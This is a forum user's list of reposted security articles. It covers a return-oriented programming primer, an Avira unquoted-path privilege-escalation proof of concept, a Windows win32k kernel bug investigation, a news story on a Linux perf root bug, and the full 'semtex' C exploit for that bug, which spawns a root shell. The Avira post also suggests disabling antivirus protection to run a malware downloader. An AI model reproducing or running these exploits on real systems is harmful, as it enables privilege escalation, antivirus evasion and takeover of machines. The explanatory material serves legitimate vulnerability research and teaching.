-
Posts
18732 -
Joined
-
Last visited
-
Days Won
710
Everything posted by Nytro
-
ropasaurusrex: a primer on return-oriented programming One of the worst feelings when playing a capture-the-flag challenge is the hindsight problem. You spend a few hours on a level—nothing like the amount of time I spent on cnot, not by a fraction—and realize that it was actually pretty easy. But also a brainfuck. That's what ROP's all about, after all! Anyway, even though I spent a lot of time working on the wrong solution (specifically, I didn't think to bypass ASLR for quite awhile), the process we took of completing the level first without, then with ASLR, is actually a good way to show it, so I'll take the same route on this post. Before I say anything else, I have to thank HikingPete for being my wingman on this one. Thanks to him, we solved this puzzle much more quickly and, for a short time, were in 3rd place worldwide! Coincidentally, I've been meaning to write a post on ROP for some time now. I even wrote a vulnerable demo program that I was going to base this on! But, since PlaidCTF gave us this challenge, I thought I'd talk about it instead! This isn't just a writeup, this is designed to be a fairly in-depth primer on return-oriented programming! If you're more interested in the process of solving a CTF level, have a look at my writeup of cnot. What the heck is ROP? ROP—return-oriented programming—is a modern name for a classic exploit called "return into libc". The idea is that you found an overflow or other type of vulnerability in a program that lets you take control, but you have no reliable way get your code into executable memory (DEP, or data execution prevention, means that you can't run code from anywhere you want anymore). With ROP, you can pick and choose pieces of code that are already in sections executable memory and followed by a 'return'. Sometimes those pieces are simple, and sometimes they're complicated. In this exercise, we only need the simple stuff, thankfully! But, we're getting ahead of ourselves. Let's first learn a little more about the stack! I'm not going to spend a ton of time explaining the stack, so if this is unclear, please check out my assembly tutorial. The stack I'm sure you've heard of the stack before. Stack overflows? Smashing the stack? But what's it actually mean? If you already know, feel free to treat this as a quick primer, or to just skip right to the next section. Up to you! The simple idea is, let's say function A() calls function B() with two parameters, 1 and 2. Then B() calls C() with two parameters, 3 and 4. When you're in C(), the stack looks like this: +----------------------+ | ... | (higher addresses) +----------------------+ +----------------------+ <-- start of 'A's stack frame | [return address] | <-- address of whatever called 'A' +----------------------+ | [frame pointer] | +----------------------+ | [local variables] | +----------------------+ +----------------------+ <-- start of 'B's stack frame | 2 (parameter)| +----------------------+ | 1 (parameter)| +----------------------+ | [return address] | <-- the address that 'B' returns to +----------------------+ | [frame pointer] | +----------------------+ | [local variables] | +----------------------+ +----------------------+ <-- start of 'C's stack frame | 4 (parameter)| +----------------------+ | 3 (parameter)| +----------------------+ | [return address] | <-- the address that 'C' returns to +----------------------+ +----------------------+ | ... | (lower addresses) +----------------------+ This is quite a mouthful (eyeful?) if you don't live and breathe all the time at this depth, so let me explain a bit. Every time you call a function, a new "stack frame" is built. A "frame" is simply some memory that the function allocates for itself on the stack. In fact, it doesn't even allocate it, it just adds stuff to the end and updates the esp register so any functions it calls know where its own stack frame needs to start (esp, the stack pointer, is basically a variable). This stack frame holds the context for the current function, and lets you easily a) build frames for new functions being called, and return to previous frames (i.e., return from functions). esp (the stack pointer) moves up and down, but always points to the top of the stack (the lowest address). Have you ever wondered where a function's local variables go when you call another function (or, better yet, you call the same function again recursively)? Of course not! But if you did, now you'd know: they wind up in an old stack frame that we return to later! Now, let's look at what's stored on the stack, in the order it gets pushed (note that, confusingly, you can draw a stack either way; in this document, the stack grows from top to bottom, so the older/callers are on top and the newer/callees are on the bottom): Parameters: The parameters that were passed into the function by the caller—these are extremely important with ROP. Return address: Every function needs to know where to go when it's done. When you call a function, the address of the instruction right after the call is pushed onto the stack prior to entering the new function. When you return, the address is popped off the stack and is jumped to. This is extremely important with ROP. Saved frame pointer: Let's totally ignore this. Seriously. It's just something that compilers typically do, except when they don't, and we won't speak of it again. Local variables: A function can allocate as much memory as it needs (within reason) to store local variables. They go here. They don't matter at all for ROP and can be safely ignored. So, to summarize: when a function is called, parameters are pushed onto the stack, followed by the return address. When the function returns, it grabs the return address off the stack and jumps to it. The parameters pushed onto the stack are removed by the calling function, except when they're not. We're going to assume the caller cleans up, that is, the function doesn't clean up after itself, since that's is how it works in this challenge (and most of the time on Linux). Heaven, hell, and stack frames The main thing you have to understand to know ROP is this: a function's entire universe is its stack frame. The stack is its god, the parameters are its commandments, local variables are its sins, the saved frame pointer is its bible, and the return address is its heaven (okay, probably hell). It's all right there in the Book of Intel, chapter 3, verses 19 - 26 (note: it isn't actually, don't bother looking). Let's say you call the sleep() function, and get to the first line; its stack frame is going to look like this: ... <-- don't know, don't care territory (higher addresses) +----------------------+ | [seconds] | +----------------------+ | [return address] | <-- esp points here +----------------------+ ... <-- not allocated, don't care territory (lower addresses) When sleep() starts, this stack frame is all it sees. It can save a frame pointer (crap, I mentioned it twice since I promised not to; I swear I won't mention it again) and make room for local variables by subtracting the number of bytes it wants from esp (ie, making esp point to a lower address). It can call other functions, which create new frames under esp. It can do many different things; what matters is that, when it sleep() starts, the stack frame makes up its entire world. When sleep() returns, it winds up looking like this: ... <-- don't know, don't care territory (higher addresses) +----------------------+ | [seconds] | <-- esp points here +----------------------+ | [old return address] | <-- not allocated, don't care territory starts here now +----------------------+ ... (lower addresses) And, of course, the caller, after sleep() returns, will remove "seconds" from the stack by adding 4 to esp (later on, we'll talk about how we have to use pop/pop/ret constructs to do the same thing). In a properly working system, this is how life works. That's a safe assumption. The "seconds" value would only be on the stack if it was pushed, and the return address is going to point to the place it was called from. Duh. How else would it get there? Controlling the stack ...well, since you asked, let me tell you. We've all heard of a "stack overflow", which involves overwriting a variable on the stack. What's that mean? Well, let's say we have a frame that looks like this: ... <-- don't know, don't care territory (higher addresses) +----------------------+ | [seconds] | +----------------------+ | [return address] | <-- esp points here +----------------------+ | char buf[16] | | | | | | | +----------------------+ ... (lower addresses) The variable buf is 16 bytes long. What happens if a program tries to write to the 17th byte of buf (i.e., buf[16])? Well, it writes to the last byte—little endian—of the return address. The 18th byte writes to the second-last byte of the return address, and so on. Therefore, we can change the return address to point to anywhere we want. Anywhere we want. So when the function returns, where's it go? Well, it thinks it's going to where it's supposed to go—in a perfect world, it would be—but nope! In this case, it's going to wherever the attacker wants it to. If the attacker says to jump to , it jumps to 0 and crashes. If the attacker says to go to 0x41414141 ("AAAA"), it jumps there and probably crashes. If the attacker says to jump to the stack... well, that's where it gets more complicated... DEP Traditionally, an attacker would change the return address to point to the stack, since the attacker already has the ability to put code on the stack (after all, code is just a bunch of bytes!). But, being that it was such a common and easy way to exploit systems, those assholes at OS companies (just kidding, I love you guys ) put a stop to it by introducing data execution prevention, or DEP. On any DEP-enabled system, you can no longer run code on the stack—or, more generally, anywhere an attacker can write—instead, it crashes. So how the hell do I run code without being allowed to run code!? Well, we're going to get to that. But first, let's look at the vulnerability that the challenge uses! The vulnerability Here's the vulnerable function, fresh from IDA: 1 .text:080483F4vulnerable_function proc near 2 .text:080483F4 3 .text:080483F4buf = byte ptr -88h 4 .text:080483F4 5 .text:080483F4 push ebp 6 .text:080483F5 mov ebp, esp 7 .text:080483F7 sub esp, 98h 8 .text:080483FD mov dword ptr [esp+8], 100h ; nbytes 9 .text:08048405 lea eax, [ebp+buf] 10 .text:0804840B mov [esp+4], eax ; buf 11 .text:0804840F mov dword ptr [esp], 0 ; fd 12 .text:08048416 call _read 13 .text:0804841B leave 14 .text:0804841C retn 15 .text:0804841Cvulnerable_function endp Now, if you don't know assembly, this might look daunting. But, in fact, it's simple. Here's the equivalent C: 1 ssize_t __cdecl vulnerable_function() 2 { 3 char buf[136]; 4 return read(0, buf, 256); 5 } ARTICOL COMPLET: http://www.skullsecurity.org/blog/2013/ropasaurusrex-a-primer-on-return-oriented-programming
-
[h=2]Avira Personal Privilege Escalation Vulnerability[/h] ============================================ Tested on OS: Microsoft Windows XP Professional 5.1.2600 Service Pack 2 2600 ============================================ Vulnerable Software: Avira Personal Tested version of Avira: ============================================ Product version 10.2.0.719 25.10.2012 Search engine 8.02.12.38 07.05.2013 Virus definition file 7.11.77.54 08.05.2013 Control Center 10.00.12.31 21.07.2011 Config Center 10.00.13.20 21.07.2011 Luke Filewalker 10.03.00.07 21.07.2011 AntiVir Guard 10.00.01.59 21.07.2011 Filter 10.00.26.09 21.07.2011 AntiVir WebGuard 10.01.09.00 09.05.2011 Scheduler 10.00.00.21 21.04.2011 Updater 10.00.00.39 21.07.2011 ============================================ Vulnerability: Privilegie Escalation ============================================ Proof Of concept: If the attacker somehow manages upload any malicious files to root directory of OS installed disk (%homedrive%) in the following manner: C:\Program.exe (In example attacker is limited to execute any file from webserver but is able upload any file to %homedrive%\ ) On next reboot this can be used to escalate privileges to NT_AUTHORITY/SYSTEM due vulnerability in Avira Personal(if that machine uses Avira Personal). ============================================ The main trouble begins from here: http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425%28v=vs.85%29.aspx Parameters lpApplicationName [in, optional] c:\program.exe files\sub dir\program name c:\program files\sub.exe dir\program name c:\program files\sub dir\program.exe name c:\program files\sub dir\program name.exe ============================================ For this purposes i have used the following AutoIT script (then compiled it to 32 bit win32 binary) While 1 sleep(18000);//sleep for 18 seconds for fun MsgBox(64,"","Blah!" & @CRLF & "Woot: We got=> " & @UserName);//display the current user ShellExecute("cmd.exe");//launch cmd.exe ;Enjoy WEnd and uploaded it as Program.exe to C:\ Then simply rebooted machine. Here is result on next reboot: See escal1.PNG http://i052.radikal.ru/1305/69/7bb1ce0323ec.png http://s56.radikal.ru/i152/1305/03/10bc43883c89.png In eg: this vuln can be used in the following situations: http://packetstormsecurity.com/files/121168/MiniWeb-File-Upload-Directory-Traversal.html Attacker is able to upload arbitrary files to system but he/she is unable to execute it. ON next reboot attacker can escalate privileges to SYSTEM privilegie due vulnerability in Avira Personal. This is also possible disable Realtime protection(Guard) of Avira personal in the following way on next reboot: =========================Compile as program.exe and place to %homedrive%\==================== While 1 sleep(3600*1000); WEnd ====Start your another troyan downloader and download/execute known malware to Avira========== # 98CC4E5E757987B4 1337day.com [2013-05-17] 45058B9096F3ABCA # Sursa: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
-
[h=3]Introduction to Windows Kernel Security Research[/h]A few months ago, I mentioned a crash I'd encountered under memory pressure on windows. I was hoping sharing a reproducer might stimulate someone who was interested in learning about kernel debugging to investigate, learning some new skills and possibly getting some insight into researching security issues, potentially getting a head start on discovering their own. Sadly, I've yet to hear back from anyone who had done any work on it. I think the path subsystem is obscure enough that it felt too daunting a task for someone new to jump into, and the fact that the reproducer is not reliable might have been scary. I've decided to help get you started, hopefully someone will feel inspired enough to continue. Before reading this post, I assume you're comfortable with kd, IDA Pro and debugging without source code. First some background, hopefully you're already familiar with GDI basics and understand Pens, Brushes and so on. Paths are basically shapes that can be created by moving between points, they can be straight lines, or irregular and composed of curves, arcs, etc. Internally, a path is stored as a linked list of it's components (points, curves, etc). http://msdn.microsoft.com/en-us/library/windows/desktop/dd162779(v=vs.85).aspx The path subsystem is very old (pre-NT?), and uses it's own object allocator called PATHALLOC. PATHALLOC is relatively simple, it's backed (indirectly) by HeavyAllocPool() with the tag 'tapG', but does include it's own simple freelist implementation to reduce calls to HeavyAllocPool. The PATHALLOC entrypoints are newpathalloc() and freepathalloc(), if you look at the code you'll see it's very simple and easy to understand. Notice that if an allocation cannot be satisfied from the freelist, newpathalloc will always memset zero allocations via PALLOCMEM(), similar to what you might expect from calloc. However, take a look at the freelist check, if the allocation is satisfied from the freelist, it skips the memset zero. Therefore, it might return allocations that have not been initialized, and callers must be sure to do this themselves. It turns out, getting an object from the freelist happens quite rarely, so the few cases that don't initialize their path object have survived over 20 years in NT. The case we're going to take a look at is EPATHOBJ::pprFlattenRec(). Hopefully you're familiar with the concept of flattening, the process of translating a bezier curve into a sequence of lines. The details of how this works are not important, just remember that curves are converted into lines. [TABLE=class: tr-caption-container, align: center] [TR] [TD=align: center][/TD] [/TR] [TR] [TD=class: tr-caption, align: center]Flattening a curve, illustration from GraphicsPath MSDN documentation.[/TD] [/TR] [/TABLE] EPATHOBJ::pprFlattenRec() is an internal routine for applying this process to a linked list of PATHRECORD objects. If you follow the logic, you can see that the PATHRECORD object retrieved from newpathrec() is mostly initialized, but with one obvious error: EPATHOBJ::pprFlattenRec(_PATHRECORD *)+33: .text:BFA122CD mov eax, [esi+PATHRECORD.prev] ; load old prev .text:BFA122D0 push edi .text:BFA122D1 mov edi, [ebp+new] ; get the new PATHRECORD .text:BFA122D4 mov [edi+PATHRECORD.prev], eax ; copy prev pointer over .text:BFA122D7 lea eax, [edi+PATHRECORD.count] ; save address of count member .text:BFA122DA xor edx, edx ; set count to zero .text:BFA122DC mov [eax], edx .text:BFA122DE mov ecx, [esi+PATHRECORD.flags] ; load flags .text:BFA122E1 and ecx, 0FFFFFFEFh ; clear bezier flag (bezier means divide points by 3 because you need two control points and an ending point). .text:BFA122E4 mov [edi+PATHRECORD.flags], ecx ; copy old flags over The next pointer is never initialized! Most of the time you want a new list node to have the next pointer set to NULL, so this works if you don't get your object from the freelist, but otherwise it won't work! How can we verify this hypothesis? Let's patch newpathrec() to always set the next pointer to a recognisable value, and see if we can reproduce the crash (Note: I don't use conditional breakpoints because of the performance overhead, if you're using something fancy like virtualkd, it's probably better to use them). There's a useless assertion in the checked build I don't need, I'll just overwrite the code with mov [pathrec->next], dword 0x41414141, like this (you can use the built in assembler if you want, but I don't like the syntax): kd> ba e 1 win32k!EPATHOBJ::newpathrec+31 kd> g Breakpoint 0 hit win32k!EPATHOBJ::newpathrec+0x31: 96611e9a 83f8ff cmp eax,0FFFFFFFFh kd> eb @eip c7 41 F0 41 41 41 41 90 90 90 90 90 90 90 90 90 90 kd> bc * kd> g Access violation - code c0000005 (!!! second chance !!!) win32k!EPATHOBJ::bFlatten+0x15: 9661252c f6400810 test byte ptr [eax+8],10h kd> r eax=41414141 ebx=9659017e ecx=a173bbec edx=00000001 esi=a173bbec edi=03010034 eip=9661252c esp=a173bbe4 ebp=a173bc28 iopl=0 nv up ei pl nz na pe nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010206 win32k!EPATHOBJ::bFlatten+0x15: 9661252c f6400810 test byte ptr [eax+8],10h ds:0023:41414149=?? This looks like convincing evidence that a newpathrec() caller is not initialising new objects correctly. When bFlatten() tried to traverse the linked list of PATHREC objects, it doesn't find the NULL it was expecting. We know the PATHREC list starts at EPATHOBJ+8, the pointer to the first element is in PATHREC+14, and the next pointer is at +0, so we can look at the chain of PATHREC objects that caused bFlatten() to crash in kd. The EPATHOBJ is in ecx (Because of the thiscall calling convention). The PATHREC list starts at poi(ecx+8) The first element in the list is at poi(poi(ecx+8)+14) (i.e. the head pointer) The next pointer for the first record will be at +0 in the PATHREC poi(poi(poi(ecx+8)+14)) We can keep adding poi() calls until we find the bad next pointer: this ecx [*]this->pathlist poi(ecx+8) [*]this->pathlist->head poi(poi(ecx+8)+14) [*]this->pathlist->head->next poi(poi(poi(ecx+8)+14)) [*]this->pathlist->head->next->next poi(poi(poi(poi(ecx+8)+14))) [*]this->pathlist->head->next->next->next poi(poi(poi(poi(poi(ecx+8)+14)))) [*]etc. Here is the object with the bad next pointer for me: kd> dd poi(poi(poi(ecx+8)+14)) fe9395a4 ff1fdde5 fe93904c 00000000 00000149 fe9395b4 01a6d0bf 00ec8b39 01a68f40 00ec19f2 fe9395c4 01a64da5 00eba8c0 01a60bee 00eb37a5 fe9395d4 01a5ca1b 00eac69f 01a5882d 00ea55af fe9395e4 01a54623 00e9e4d5 01a503fd 00e97411 fe9395f4 01a4c1bb 00e90362 01a47f5e 00e892ca fe939604 01a43ce6 00e82247 01a3fa52 00e7b1da fe939614 01a3b7a2 00e74183 01a374d7 00e6d142 The standard process for researching this kind of problem is to implement the various primitives we can chain together to get the behaviour we want reliably. These are the building blocks we use to control what's happening. Conceptually, this is something like: Primitive 1: Allocate a path object with as much contents controlled as possible. Primitive 2: Get that path object released and added to the freelist. Primitive 3: Trigger the bad allocation from the freelist. Once we have implemented these, we can chain them together to move an EPATHOBJ reliably into userspace, and then we can investigate if it's exploitable. Let's work on this. Controlling the contents of a PATHREC object A PATHREC looks something like this: struct PATHREC { VOID *next; VOID *prev; ULONG flags; ULONG count; // Number of points in array POINTFIX points[0]; // variable length array }; POINTFIX is documented in msdn as "A point structure that consists of {FIX x, y;}.". Let's try adding a large number of points to a path consisting of recognisable values as x,y coordinates with PolyBezierTo() and see if we can find it. If we break during the bounds checking in newpathrec(), we should be able to dump out the points and see if we hit it. I wrote some code like this (pseudocode): POINT *Points = calloc(8192, sizeof(POINT)); while (TRUE) { for (i = 0; i < 8192; i++) { Points[i].x = 0xDEAD; Points[i].y = 0xBEEF; } BeginPath(Device); PolyBezierTo(Device, Points, 8192 / 3); EndPath(Device); } And put a breakpoint in newpathrec(), and after some waiting, I see this: kd> ba e 1 win32k!EPATHOBJ::newpathrec+23 "dd @ecx; gc" kd> g fe85814c 000dead0 000beef0 000dead0 000beef0 fe85815c 000dead0 000beef0 000dead0 000beef0 fe85816c 000dead0 000beef0 000dead0 000beef0 fe85817c 000dead0 000beef0 000dead0 000beef0 fe85818c 000dead0 000beef0 000dead0 000beef0 fe85819c 000dead0 000beef0 000dead0 000beef0 fe8581ac 000dead0 000beef0 000dead0 000beef0 fe8581bc 000dead0 000beef0 000dead0 000beef0 This confirms the theory, that this trick can be used to get our blocks on the freelist. I spent some time making this reliable. Spamming the freelist with our POINTFIX structures Lets make sure that our paths are full of curves with these points, and then flatten them to resize them (thus reducing the number of points). If it works, just by chance we should start to see the original testcase crashing at recognisable addresses. GDISRV:AllocateObject failed alloc of 2268 bytes GDISRV:AllocateObject failed alloc of 2268 bytes GDISRV:AllocateObject failed alloc of 2268 bytes Access violation - code c0000005 (!!! second chance !!!) 9661252c f6400810 test byte ptr [eax+8],10h kd> r eax=04141410 ebx=9659017e ecx=8ef67bec edx=00000001 esi=8ef67bec edi=03010034 eip=9661252c esp=8ef67be4 ebp=8ef67c28 iopl=0 nv up ei pl nz na po nc cs=0008 ss=0010 ds=0023 es=0023 fs=0030 gs=0000 efl=00010202 win32k!EPATHOBJ::bFlatten+0x15: 9661252c f6400810 test byte ptr [eax+8],10h ds:0023:04141418=?? kd> kv ChildEBP RetAddr Args to Child 8ef67be4 965901ce 00000001 00000119 fe71cef0 win32k!EPATHOBJ::bFlatten+0x15 (FPO: [0,0,4]) 8ef67c28 829e0173 03010034 001cfb48 76f0a364 win32k!NtGdiFlattenPath+0x50 (FPO: [Non-Fpo]) 8ef67c28 76f0a364 03010034 001cfb48 76f0a364 nt!KiFastCallEntry+0x163 (FPO: [0,3] TrapFrame @ 8ef67c34) Success! Now we have at least some control over the address, which is something to work with. You can see in EPATHOBJ::bFlatten() the object is handed over to EPATHOBJ::pprFlattenRec(), which is a good place to start looking to look for exploitation opportunities, possibly turning this into code execution. You can copy my portable shellcode from my KiTrap0D exploit if you need one, which should work reliably on many different kernels, the source code is available here: http://lock.cmpxchg8b.com/c0af0967d904cef2ad4db766a00bc6af/KiTrap0D.zip If nobody jumps in, I'll keep adding more notes. Feel free to ask me questions if you get stuck or need a hand! If you solve the mystery and determine this is a security issue, send me an email and I'll update this post. If you confirm it is exploitable, feel free to send your work to Microsoft if you feel so compelled, if this is your first time researching a potential vulnerability it might be an interesting experience. Note that Microsoft treat vulnerability researchers with great hostility, and are often very difficult to work with. I would advise only speaking to them under a pseudonym, using tor and anonymous email to protect yourself. Posted by Tavis Ormandy at 7:12 PM Sursa: Tavis Ormandy: Introduction to Windows Kernel Security Research
-
[h=1]Critical Linux vulnerability imperils users, even after “silent” fix[/h][h=2]A month after critical bug was quietly fixed, "root" vulnerability persists.[/h]by Dan Goodin - May 15 2013, 7:44pm GTBST For more than two years, the Linux operating system has contained a high-severity vulnerability that gives untrusted users with restricted accounts nearly unfettered "root" access over machines, including servers running in shared Web hosting facilities and other sensitive environments. Surprisingly, most users remain wide open even now, more than a month after maintainers of the open-source OS quietly released an update that patched the gaping hole. The severity of the bug, which resides in the Linux kernel's "perf," or performance counters subsystem, didn't become clear until Tuesday, when attack code exploiting the vulnerability became publicly available (note: some content on this site is not considered appropriate in many work environments). The new script can be used to take control of servers operated by many shared Web hosting providers, where dozens or hundreds of people have unprivileged accounts on the same machine. Hackers who already have limited control over a Linux machine—for instance, by exploiting a vulnerability in a desktop browser or a Web application—can also use the bug to escalate their privileges to root. The flaw affects versions of the Linux kernel from 2.6.37 to 3.8.8 that have been compiled with the CONFIG_PERF_EVENTS kernel configuration option. "Because there's a public exploit already available, an attacker would simply need to download and run this exploit on a target machine," Dan Rosenberg, a senior security researcher at Azimuth Security, told Ars in an e-mail. "The exploit may not work out-of-the-box on every affected machine, in which case it would require some fairly straightforward tweaks (for someone with exploit development experience) to work properly." The fix to the Linux kernel was published last month. Its documentation did not mention that the code patched a critical vulnerability that could jeopardize the security of organizations running Linux in highly sensitive environments. This lack of security advisories has been standard practice for years among Linus Torvalds and other developers of the Linux kernel—and has occasionally been the subject of intense criticism from some in security circles. Now that a fix is available in the kernel, it will be folded into all of the affected stable kernel releases offered by kernel.org, which maintains the Linux core code. Individual distributions are expected to apply the fix to their kernels and publish security updates in the coming days. Additional details of the bug are available here, here, here, and here. People running vulnerable machines with untrusted user accounts should check with their distributors to find out when a patch will be available and what steps can be taken in the meantime. One user of a Red Hat Linux distribution posted temporary mitigation steps here, although at time of writing, Ars was unable to confirm that they worked. Readers are encouraged to post other mitigation advice in comments. Sursa: Critical Linux vulnerability imperils users, even after “silent” fix | Ars Technica
-
/* * linux 2.6.37-3.x.x x86_64, ~100 LOC * gcc-4.6 -O2 semtex.c && ./a.out * 2010 sd@fucksheep.org, salut! * * update may 2013: * seems like centos 2.6.32 backported the perf bug, lol. * jewgold to 115T6jzGrVMgQ2Nt1Wnua7Ch1EuL9WXT2g if you insist. */ #define _GNU_SOURCE 1 #include <stdint.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <sys/mman.h> #include <syscall.h> #include <stdint.h> #include <assert.h> #define BASE 0x380000000 #define SIZE 0x010000000 #define KSIZE 0x2000000 #define AB(x) ((uint64_t)((0xababababLL<<32)^((uint64_t)((x)*313337)))) void fuck() { int i,j,k; uint64_t uids[4] = { AB(2), AB(3), AB(4), AB(5) }; uint8_t *current = *(uint8_t **)(((uint64_t)uids) & (-8192)); uint64_t kbase = ((uint64_t)current)>>36; uint32_t *fixptr = (void*) AB(1); *fixptr = -1; for (i=0; i<4000; i+=4) { uint64_t *p = (void *)¤t[i]; uint32_t *t = (void*) p[0]; if ((p[0] != p[1]) || ((p[0]>>36) != kbase)) continue; for (j=0; j<20; j++) { for (k = 0; k < 8; k++) if (((uint32_t*)uids)[k] != t[j+k]) goto next; for (i = 0; i < 8; i++) t[j+i] = 0; for (i = 0; i < 10; i++) t[j+9+i] = -1; return; next:; } } } void sheep(uint32_t off) { uint64_t buf[10] = { 0x4800000001,off,0,0,0,0x300 }; int fd = syscall(298, buf, 0, -1, -1, 0); assert(!close(fd)); } int main() { uint64_t u,g,needle, kbase, *p; uint8_t *code; uint32_t *map, j = 5; int i; struct { uint16_t limit; uint64_t addr; } __attribute__((packed)) idt; assert((map = mmap((void*)BASE, SIZE, 3, 0x32, 0,0)) == (void*)BASE); memset(map, 0, SIZE); sheep(-1); sheep(-2); for (i = 0; i < SIZE/4; i++) if (map[i]) { assert(map[i+1]); break; } assert(i<SIZE/4); asm ("sidt %0" : "=m" (idt)); kbase = idt.addr & 0xff000000; u = getuid(); g = getgid(); assert((code = (void*)mmap((void*)kbase, KSIZE, 7, 0x32, 0, 0)) == (void*)kbase); memset(code, 0x90, KSIZE); code += KSIZE-1024; memcpy(code, &fuck, 1024); memcpy(code-13,"\x0f\x01\xf8\xe8\5\0\0\0\x0f\x01\xf8\x48\xcf", printf("2.6.37-3.x x86_64\nsd@fucksheep.org 2010\n") % 27); setresuid(u,u,u); setresgid(g,g,g); while (j--) { needle = AB(j+1); assert(p = memmem(code, 1024, &needle, 8)); if (!p) continue; *p = j?((g<<32)|u):(idt.addr + 0x48); } sheep(-i + (((idt.addr&0xffffffff)-0x80000000)/4) + 16); asm("int $0x4"); assert(!setuid(0)); return execl("/bin/bash", "-sh", NULL); } Sursa: http://fucksheep.org/~sd/warez/semtex.c
-
[h=1]Microsoft Security Bulletin Summary for May 2013[/h] Published: Tuesday, May 14, 2013 Version: 1.0 This bulletin summary lists security bulletins released for May 2013. With the release of the security bulletins for May 2013, this bulletin summary replaces the bulletin advance notification originally issued May 9, 2013. For more information about the bulletin advance notification service, see Microsoft Security Bulletin Advance Notification. For information about how to receive automatic notifications whenever Microsoft security bulletins are issued, visit Microsoft Technical Security Notifications. Microsoft is hosting a webcast to address customer questions on these bulletins on May 15, 2013, at 11:00 AM Pacific Time (US & Canada). Register now for the May Security Bulletin Webcast. After this date, this webcast is available on-demand. Microsoft also provides information to help customers prioritize monthly security updates with any non-security updates that are being released on the same day as the monthly security updates. Please see the section, Other Information. [h=3]Bulletin Information[/h][h=4]Executive Summaries[/h]The following table summarizes the security bulletins for this month in order of severity. For details on affected software, see the next section, Affected Software. [TABLE=class: dataTable, width: 88%] [TR] [TH]Bulletin ID[/TH] [TH]Bulletin Title and Executive Summary[/TH] [TH]Maximum Severity Rating and Vulnerability Impact[/TH] [TH]Restart Requirement[/TH] [TH]Affected Software[/TH] [/TR] [TR] [TD]MS13-037[/TD] [TD]Cumulative Security Update for Internet Explorer (2829530)This security update resolves eleven privately reported vulnerabilities in Internet Explorer. The most severe vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited the most severe of these vulnerabilities could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.[/TD] [TD]Critical Remote Code Execution[/TD] [TD]Requires restart[/TD] [TD]Microsoft Windows, Internet Explorer [/TD] [/TR] [TR=class: alternateRow] [TD]MS13-038[/TD] [TD]Security Update for Internet Explorer (2847204) This security update resolves one publicly disclosed vulnerability in Internet Explorer. The vulnerability could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.[/TD] [TD]Critical Remote Code Execution[/TD] [TD]May require restart[/TD] [TD]Microsoft Windows, Internet Explorer [/TD] [/TR] [TR] [TD]MS13-039[/TD] [TD]Vulnerability in HTTP.sys Could Allow Denial of Service (2829254) This security update resolves a privately reported vulnerability in Microsoft Windows. The vulnerability could allow denial of service if an attacker sends a specially crafted HTTP packet to an affected Windows server or client.[/TD] [TD]Important Denial of Service[/TD] [TD]Requires restart[/TD] [TD]Microsoft Windows [/TD] [/TR] [TR=class: alternateRow] [TD]MS13-040 [/TD] [TD]Vulnerabilities in .NET Framework Could Allow Spoofing (2836440)This security update resolves one privately reported vulnerability and one publicly disclosed vulnerabilityin the .NET Framework. The more severe of the vulnerabilities could allow spoofing if a .NET application receives a specially crafted XML file. An attacker who successfully exploited the vulnerabilities could modify the contents of an XML file without invalidating the file's signature and could gain access to endpoint functions as if they were an authenticated user.[/TD] [TD]Important Spoofing[/TD] [TD]May require restart[/TD] [TD]Microsoft Windows, Microsoft .NET Framework [/TD] [/TR] [TR] [TD]MS13-041[/TD] [TD]Vulnerability in Lync Could Allow Remote Code Execution (2834695) This security update resolves a privately reported vulnerability in Microsoft Lync. The vulnerability could allow remote code execution if an attacker shares specially crafted content, such as a file or program, as a presentation in Lync or Communicator and then convinces a user to accept an invitation to view or share the presentable content. In all cases, an attacker would have no way to force users to view or share the attacker-controlled file or program. Instead, an attacker would have to convince users to take action, typically by getting them to accept an invitation in Lync or Communicator to view or share the presentable content.[/TD] [TD]Important Remote Code Execution[/TD] [TD]May require restart[/TD] [TD]Microsoft Lync [/TD] [/TR] [TR=class: alternateRow] [TD]MS13-042 [/TD] [TD]Vulnerabilities in Microsoft Publisher Could Allow Remote Code Execution (2830397)This security update resolves eleven privately reported vulnerabilities in Microsoft Office. The vulnerabilities could allow remote code execution if a user open a specially crafted Publisher file with an affected version of Microsoft Publisher. An attacker who successfully exploited these vulnerabilities could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.[/TD] [TD]Important Remote Code Execution[/TD] [TD]May require restart[/TD] [TD]Microsoft Office [/TD] [/TR] [TR] [TD]MS13-043[/TD] [TD]Vulnerability in Microsoft Word Could Allow Remote Code Execution (2830399) This security update resolves one privately reported vulnerability in Microsoft Office. The vulnerability could allow code execution if a user opens a specially crafted file or previews a specially crafted email message in an affected version of Microsoft Office software. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. Users whose accounts are configured to have fewer user rights on the system could be less impacted than users who operate with administrative user rights.[/TD] [TD]Important Remote Code Execution[/TD] [TD]May require restart[/TD] [TD]Microsoft Office [/TD] [/TR] [TR=class: alternateRow] [TD]MS13-044[/TD] [TD]Vulnerability in Microsoft Visio Could Allow Information Disclosure (2834692)This security update resolves a privately reported vulnerability in Microsoft Office. The vulnerability could allow information disclosure if a user opens a specially crafted Visio file. Note that this vulnerability would not allow an attacker to execute code or to elevate their user rights directly, but it could be used to produce information that could be used to try to further compromise an affected system.[/TD] [TD]Important Information Disclosure[/TD] [TD]May require restart[/TD] [TD]Microsoft Office [/TD] [/TR] [TR] [TD]MS13-045[/TD] [TD]Vulnerability in Windows Essentials Could Allow Information Disclosure (2813707)This security update resolves a privately reported vulnerability in Windows Essentials. The vulnerability could allow information disclosure if a user opens Windows Writer using a specially crafted URL. An attacker who successfully exploited the vulnerability could override Windows Writer proxy settings and overwrite files accessible to the user on the target system. In a web-based attack scenario, a website could contain a specially crafted link that is used to exploit this vulnerability. An attacker would have to convince users to visit the website and open the specially crafted link.[/TD] [TD]Important Information Disclosure[/TD] [TD]May require restart[/TD] [TD]Microsoft Windows Essentials [/TD] [/TR] [TR=class: alternateRow] [TD]MS13-046[/TD] [TD]Vulnerabilities in Kernel-Mode 